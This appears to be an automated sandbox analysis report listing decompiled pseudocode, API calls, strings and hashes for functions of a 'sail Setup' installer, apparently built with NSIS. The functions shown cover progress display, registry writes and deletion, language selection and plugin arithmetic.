                                                                                                                          Function 00402B3B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b018; // 0x7e00
					_t11 =  *0x41f028;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                          0x00402b48
                                                                                                                          0x00402b56
                                                                                                                          0x00402b5c
                                                                                                                          0x00402b5c
                                                                                                                          0x00402b6a
                                                                                                                          0x00402b6c
                                                                                                                          0x00402b72
                                                                                                                          0x00402b79
                                                                                                                          0x00402b7b
                                                                                                                          0x00402b7b
                                                                                                                          0x00402b91
                                                                                                                          0x00402ba1
                                                                                                                          0x00402bb3
                                                                                                                          0x00402bb3
                                                                                                                          0x00402bbb

                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                                          • MulDiv.KERNEL32(00007E00,00000064,?), ref: 00402B81
                                                                                                                          • wsprintfA.USER32 ref: 00402B91
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00402BB3
                                                                                                                          Strings
                                                                                                                          • verifying installer: %d%%, xrefs: 00402B8B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                          • Opcode ID: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                                                                                                          • Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
                                                                                                                          • Opcode Fuzzy Hash: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                                                                                                          • Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t30 =  *0x423f30; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a350) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a350 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E5B( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a350, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a350, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f08 =  *0x423f08 +  *(_t37 - 4);
				return 0;
			}











                                                                                                                          0x00402304
                                                                                                                          0x00402309
                                                                                                                          0x00402313
                                                                                                                          0x0040231d
                                                                                                                          0x00402320
                                                                                                                          0x0040232a
                                                                                                                          0x0040233a
                                                                                                                          0x00402341
                                                                                                                          0x00402349
                                                                                                                          0x00402357
                                                                                                                          0x0040235b
                                                                                                                          0x00402366
                                                                                                                          0x00402366
                                                                                                                          0x0040236a
                                                                                                                          0x0040236e
                                                                                                                          0x00402374
                                                                                                                          0x00402379
                                                                                                                          0x00402379
                                                                                                                          0x0040237d
                                                                                                                          0x00402389
                                                                                                                          0x00402389
                                                                                                                          0x004023a2
                                                                                                                          0x004023a4
                                                                                                                          0x004023a4
                                                                                                                          0x004023a7
                                                                                                                          0x0040247d
                                                                                                                          0x0040247d
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402341
                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse728B.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402361
                                                                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse728B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse728B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nse728B.tmp
                                                                                                                          • API String ID: 1356686001-827905961
                                                                                                                          • Opcode ID: 9ba96a6a32475b5f8f04ccfbc4be301ddec9fd1a1c55997cdc687cc56a4b0e43
                                                                                                                          • Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
                                                                                                                          • Opcode Fuzzy Hash: 9ba96a6a32475b5f8f04ccfbc4be301ddec9fd1a1c55997cdc687cc56a4b0e43
                                                                                                                          • Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004037EF, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004037EF(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405954(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ec4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423e90; // 0x4868b0
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ec0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423660 = _t18[1];
					 *0x423f28 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42365c = _t23;
						E0040593B(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420450, E004059FF(_t13, _t24, _t26, "sail Setup", 0xfffffffe));
						_t11 =  *0x423eac; // 0x1
						_t27 =  *0x423ea8; // 0x486a5c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x486a74
								_t11 = E004059FF(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                                                                                          0x004037f3
                                                                                                                          0x004037f8
                                                                                                                          0x004037fe
                                                                                                                          0x00403803
                                                                                                                          0x00403803
                                                                                                                          0x0040380b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040380d
                                                                                                                          0x00403813
                                                                                                                          0x0040381b
                                                                                                                          0x0040381d
                                                                                                                          0x00403823
                                                                                                                          0x00403823
                                                                                                                          0x00403825
                                                                                                                          0x00403831
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403835
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403837
                                                                                                                          0x0040383c
                                                                                                                          0x00403845
                                                                                                                          0x0040384b
                                                                                                                          0x00403850
                                                                                                                          0x00403864
                                                                                                                          0x0040386f
                                                                                                                          0x00403887
                                                                                                                          0x0040388d
                                                                                                                          0x00403892
                                                                                                                          0x0040389a
                                                                                                                          0x004038bb
                                                                                                                          0x004038bb
                                                                                                                          0x004038bb
                                                                                                                          0x0040389c
                                                                                                                          0x0040389e
                                                                                                                          0x0040389e
                                                                                                                          0x004038a2
                                                                                                                          0x004038a5
                                                                                                                          0x004038a9
                                                                                                                          0x004038a9
                                                                                                                          0x004038ae
                                                                                                                          0x004038b4
                                                                                                                          0x004038b4
                                                                                                                          0x00000000
                                                                                                                          0x0040389e
                                                                                                                          0x00403852
                                                                                                                          0x00403857
                                                                                                                          0x00403860
                                                                                                                          0x00403859
                                                                                                                          0x00403859
                                                                                                                          0x00403859
                                                                                                                          0x00403857

                                                                                                                          APIs
                                                                                                                          • SetWindowTextA.USER32(00000000,sail Setup), ref: 00403887
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: TextWindow
                                                                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\$\jH$sail Setup
                                                                                                                          • API String ID: 530164218-3812902334
                                                                                                                          • Opcode ID: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                                                                                                          • Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
                                                                                                                          • Opcode Fuzzy Hash: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                                                                                                          • Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001ADF, Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E10001ADF(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v148;
				void _t46;
				void _t47;
				signed int _t48;
				signed int _t49;
				signed int _t58;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t78;
				void* _t82;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				void* _t102;

				_t86 = __edx;
				 *0x10004058 = _a8;
				_t78 = 0;
				 *0x1000405c = _a16;
				_v8 = 0;
				_a16 = E10001561();
				_a8 = E10001561();
				_t91 = E10001641(_a16);
				_t82 = _a8;
				_t88 = _t86;
				_t46 =  *_t82;
				if(_t46 != 0x7e && _t46 != 0x21) {
					_v16 = E10001561();
					_t78 = E10001641(_t75);
					_v8 = _t86;
					GlobalFree(_v16);
					_t82 = _a8;
				}
				_t47 =  *_t82;
				_t102 = _t47 - 0x2f;
				if(_t102 > 0) {
					_t48 = _t47 - 0x3c;
					__eflags = _t48;
					if(_t48 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3c;
						if( *((char*)(_t82 + 1)) != 0x3c) {
							__eflags = _t88 - _v8;
							if(__eflags > 0) {
								L54:
								_t49 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t91 = _t49;
								_t88 = _t86;
								L57:
								E1000176C(_t86, _t91, _t88,  &_v148);
								E1000159E( &_v148);
								GlobalFree(_a16);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t49 = 1;
								goto L55;
							}
							__eflags = _t91 - _t78;
							if(_t91 < _t78) {
								goto L47;
							}
							goto L54;
						}
						_t86 = _t88;
						_t49 = E10002BF0(_t91, _t78, _t86);
						goto L56;
					}
					_t58 = _t48 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags = _t91 - _t78;
						if(_t91 != _t78) {
							goto L54;
						}
						__eflags = _t88 - _v8;
						if(_t88 != _v8) {
							goto L54;
						}
						goto L47;
					}
					_t59 = _t58 - 1;
					__eflags = _t59;
					if(_t59 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3e;
						if( *((char*)(_t82 + 1)) != 0x3e) {
							__eflags = _t88 - _v8;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t91 - _t78;
							if(_t91 <= _t78) {
								goto L54;
							}
							goto L47;
						}
						_t86 = _t88;
						_t49 = E10002C10(_t91, _t78, _t86);
						goto L56;
					}
					_t61 = _t59 - 0x20;
					__eflags = _t61;
					if(_t61 == 0) {
						_t91 = _t91 ^ _t78;
						_t88 = _t88 ^ _v8;
						goto L57;
					}
					_t62 = _t61 - 0x1e;
					__eflags = _t62;
					if(_t62 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x7c;
						if( *((char*)(_t82 + 1)) != 0x7c) {
							_t91 = _t91 | _t78;
							_t88 = _t88 | _v8;
							goto L57;
						}
						__eflags = _t91 | _t88;
						if((_t91 | _t88) != 0) {
							goto L47;
						}
						__eflags = _t78 | _v8;
						if((_t78 | _v8) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t62 == 0;
					if(_t62 == 0) {
						_t91 =  !_t91;
						_t88 =  !_t88;
					}
					goto L57;
				}
				if(_t102 == 0) {
					L21:
					__eflags = _t78 | _v8;
					if((_t78 | _v8) != 0) {
						_v20 = E10002A80(_t91, _t88, _t78, _v8);
						_v16 = _t86;
						_t49 = E10002B30(_t91, _t88, _t78, _v8);
						_t82 = _a8;
					} else {
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_t49 = _t91;
						_t86 = _t88;
					}
					__eflags =  *_t82 - 0x2f;
					if( *_t82 != 0x2f) {
						goto L56;
					} else {
						_t91 = _v20;
						_t88 = _v16;
						goto L57;
					}
				}
				_t68 = _t47 - 0x21;
				if(_t68 == 0) {
					_t49 = 0;
					__eflags = _t91 | _t88;
					if((_t91 | _t88) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t69 = _t68 - 4;
				if(_t69 == 0) {
					goto L21;
				}
				_t70 = _t69 - 1;
				if(_t70 == 0) {
					__eflags =  *((char*)(_t82 + 1)) - 0x26;
					if( *((char*)(_t82 + 1)) != 0x26) {
						_t91 = _t91 & _t78;
						_t88 = _t88 & _v8;
						goto L57;
					}
					__eflags = _t91 | _t88;
					if((_t91 | _t88) == 0) {
						goto L54;
					}
					__eflags = _t78 | _v8;
					if((_t78 | _v8) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t71 = _t70 - 4;
				if(_t71 == 0) {
					_t49 = E10002A40(_t91, _t88, _t78, _v8);
					goto L56;
				} else {
					_t72 = _t71 - 1;
					if(_t72 == 0) {
						_t91 = _t91 + _t78;
						asm("adc edi, [ebp-0x4]");
					} else {
						if(_t72 == 0) {
							_t91 = _t91 - _t78;
							asm("sbb edi, [ebp-0x4]");
						}
					}
					goto L57;
				}
			}


























                                                                                                                          0x10001adf
                                                                                                                          0x10001aec
                                                                                                                          0x10001af5
                                                                                                                          0x10001af8
                                                                                                                          0x10001afd
                                                                                                                          0x10001b05
                                                                                                                          0x10001b10
                                                                                                                          0x10001b19
                                                                                                                          0x10001b1b
                                                                                                                          0x10001b1e
                                                                                                                          0x10001b20
                                                                                                                          0x10001b24
                                                                                                                          0x10001b30
                                                                                                                          0x10001b39
                                                                                                                          0x10001b3e
                                                                                                                          0x10001b41
                                                                                                                          0x10001b47
                                                                                                                          0x10001b47
                                                                                                                          0x10001b4a
                                                                                                                          0x10001b4d
                                                                                                                          0x10001b50
                                                                                                                          0x10001c16
                                                                                                                          0x10001c16
                                                                                                                          0x10001c19
                                                                                                                          0x10001c82
                                                                                                                          0x10001c86
                                                                                                                          0x10001c95
                                                                                                                          0x10001c98
                                                                                                                          0x10001ca0
                                                                                                                          0x10001ca0
                                                                                                                          0x10001ca0
                                                                                                                          0x10001ca2
                                                                                                                          0x10001ca2
                                                                                                                          0x10001ca3
                                                                                                                          0x10001ca3
                                                                                                                          0x10001ca5
                                                                                                                          0x10001ca7
                                                                                                                          0x10001cb0
                                                                                                                          0x10001cbc
                                                                                                                          0x10001ccd
                                                                                                                          0x10001cd8
                                                                                                                          0x10001cd8
                                                                                                                          0x10001c9a
                                                                                                                          0x10001c7d
                                                                                                                          0x10001c7d
                                                                                                                          0x10001c7f
                                                                                                                          0x10001c7f
                                                                                                                          0x00000000
                                                                                                                          0x10001c7f
                                                                                                                          0x10001c9c
                                                                                                                          0x10001c9e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c9e
                                                                                                                          0x10001c8a
                                                                                                                          0x10001c8e
                                                                                                                          0x00000000
                                                                                                                          0x10001c8e
                                                                                                                          0x10001c1b
                                                                                                                          0x10001c1b
                                                                                                                          0x10001c1c
                                                                                                                          0x10001c74
                                                                                                                          0x10001c76
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c78
                                                                                                                          0x10001c7b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c7b
                                                                                                                          0x10001c1e
                                                                                                                          0x10001c1e
                                                                                                                          0x10001c1f
                                                                                                                          0x10001c54
                                                                                                                          0x10001c58
                                                                                                                          0x10001c67
                                                                                                                          0x10001c6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c6c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c6e
                                                                                                                          0x10001c70
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c72
                                                                                                                          0x10001c5c
                                                                                                                          0x10001c60
                                                                                                                          0x00000000
                                                                                                                          0x10001c60
                                                                                                                          0x10001c21
                                                                                                                          0x10001c21
                                                                                                                          0x10001c24
                                                                                                                          0x10001c4d
                                                                                                                          0x10001c4f
                                                                                                                          0x00000000
                                                                                                                          0x10001c4f
                                                                                                                          0x10001c26
                                                                                                                          0x10001c26
                                                                                                                          0x10001c29
                                                                                                                          0x10001c35
                                                                                                                          0x10001c39
                                                                                                                          0x10001c46
                                                                                                                          0x10001c48
                                                                                                                          0x00000000
                                                                                                                          0x10001c48
                                                                                                                          0x10001c3b
                                                                                                                          0x10001c3d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c3f
                                                                                                                          0x10001c42
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c44
                                                                                                                          0x10001c2c
                                                                                                                          0x10001c2d
                                                                                                                          0x10001c2f
                                                                                                                          0x10001c31
                                                                                                                          0x10001c31
                                                                                                                          0x00000000
                                                                                                                          0x10001c2d
                                                                                                                          0x10001b56
                                                                                                                          0x10001bce
                                                                                                                          0x10001bd0
                                                                                                                          0x10001bd3
                                                                                                                          0x10001bf1
                                                                                                                          0x10001bf4
                                                                                                                          0x10001bfa
                                                                                                                          0x10001bff
                                                                                                                          0x10001bd5
                                                                                                                          0x10001bd5
                                                                                                                          0x10001bd9
                                                                                                                          0x10001bdd
                                                                                                                          0x10001bdf
                                                                                                                          0x10001bdf
                                                                                                                          0x10001c02
                                                                                                                          0x10001c05
                                                                                                                          0x00000000
                                                                                                                          0x10001c0b
                                                                                                                          0x10001c0b
                                                                                                                          0x10001c0e
                                                                                                                          0x00000000
                                                                                                                          0x10001c0e
                                                                                                                          0x10001c05
                                                                                                                          0x10001b58
                                                                                                                          0x10001b5b
                                                                                                                          0x10001bbf
                                                                                                                          0x10001bc1
                                                                                                                          0x10001bc3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001bc9
                                                                                                                          0x10001b5d
                                                                                                                          0x10001b60
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001b62
                                                                                                                          0x10001b63
                                                                                                                          0x10001b99
                                                                                                                          0x10001b9d
                                                                                                                          0x10001bb5
                                                                                                                          0x10001bb7
                                                                                                                          0x00000000
                                                                                                                          0x10001bb7
                                                                                                                          0x10001b9f
                                                                                                                          0x10001ba1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001ba7
                                                                                                                          0x10001baa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001bb0
                                                                                                                          0x10001b65
                                                                                                                          0x10001b68
                                                                                                                          0x10001b8f
                                                                                                                          0x00000000
                                                                                                                          0x10001b6a
                                                                                                                          0x10001b6a
                                                                                                                          0x10001b6b
                                                                                                                          0x10001b7f
                                                                                                                          0x10001b81
                                                                                                                          0x10001b6d
                                                                                                                          0x10001b6f
                                                                                                                          0x10001b75
                                                                                                                          0x10001b77
                                                                                                                          0x10001b77
                                                                                                                          0x10001b6f
                                                                                                                          0x00000000
                                                                                                                          0x10001b6b

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001B41
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001CCD
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001CD2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeGlobal$lstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 176019282-0
                                                                                                                          • Opcode ID: 16e7fc8dfb2109add019363551953530b2221b6c08ce197826e595f4a50a0593
                                                                                                                          • Instruction ID: ec181f717125864b891e508b79773b0a6be540bcfc5555760108aa08b7b6b632
                                                                                                                          • Opcode Fuzzy Hash: 16e7fc8dfb2109add019363551953530b2221b6c08ce197826e595f4a50a0593
                                                                                                                          • Instruction Fuzzy Hash: DD510332D84159EBFB22CFA48880EEDB7E5EF812C4FA24159E801A311DD771EE009B52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E00402A36(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f30; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A36(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405CFF(2);
					if(_t27 == 0) {
						__eflags =  *0x423f30; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f30, 0);
				}
				return _t18;
			}










                                                                                                                          0x00402a46
                                                                                                                          0x00402a57
                                                                                                                          0x00402a5f
                                                                                                                          0x00402a87
                                                                                                                          0x00402a6e
                                                                                                                          0x00402a71
                                                                                                                          0x00402ac1
                                                                                                                          0x00402ac7
                                                                                                                          0x00402ac9
                                                                                                                          0x00000000
                                                                                                                          0x00402ac9
                                                                                                                          0x00402a7e
                                                                                                                          0x00402a83
                                                                                                                          0x00402a85
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402a85
                                                                                                                          0x00402a9c
                                                                                                                          0x00402aa4
                                                                                                                          0x00402aab
                                                                                                                          0x00402ad1
                                                                                                                          0x00402ad7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402adf
                                                                                                                          0x00402ae5
                                                                                                                          0x00402ae7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402ae7
                                                                                                                          0x00000000
                                                                                                                          0x00402aba
                                                                                                                          0x00402ace

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A57
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1912718029-0
                                                                                                                          • Opcode ID: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                                                          • Instruction ID: 582bceb6e4b24316922a1ee6e85d565da044e62c79b522cd3b8563d0d5e38007
                                                                                                                          • Opcode Fuzzy Hash: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
